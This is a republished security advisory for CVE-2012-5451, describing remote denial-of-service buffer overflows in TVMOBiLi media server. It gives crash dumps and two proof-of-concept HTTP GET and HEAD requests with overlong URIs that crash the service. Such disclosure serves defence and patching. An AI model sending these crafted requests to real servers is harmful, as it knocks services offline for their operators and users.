TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities

Summary

TVMOBiLi is prone to multiple buffer-overflow vulnerabilities because it fails to properly bounds check user-supplied input.

Credit:

The original article can be found at: https://www.htbridge.com/advisory/HTB23120


Details

Vulnerable Systems:
 * TVMOBiLi media server 2.1.0.3557 and probably prior version

2 remote DoS vulnerabilities have been discovered in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451

1.1 The vulnerability exists due to improper handling of URI length within the ‘HttpUtils.dll’ dynamic-link library. A
remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port
(default TVMOBiLi’s server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:

GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

1.2 The vulnerability exists due to improper handling of URI length within the ‘HttpUtils.dll’ dynamic-link library. A
remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and
cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000

CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:

HEAD
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

CVE Information:
CVE-2012-5451

Disclosure Timeline:
Vendor Notification: October 15, 2012
Vendor Patch: November 21, 2012
Public Disclosure: December 5, 2012

Categories: News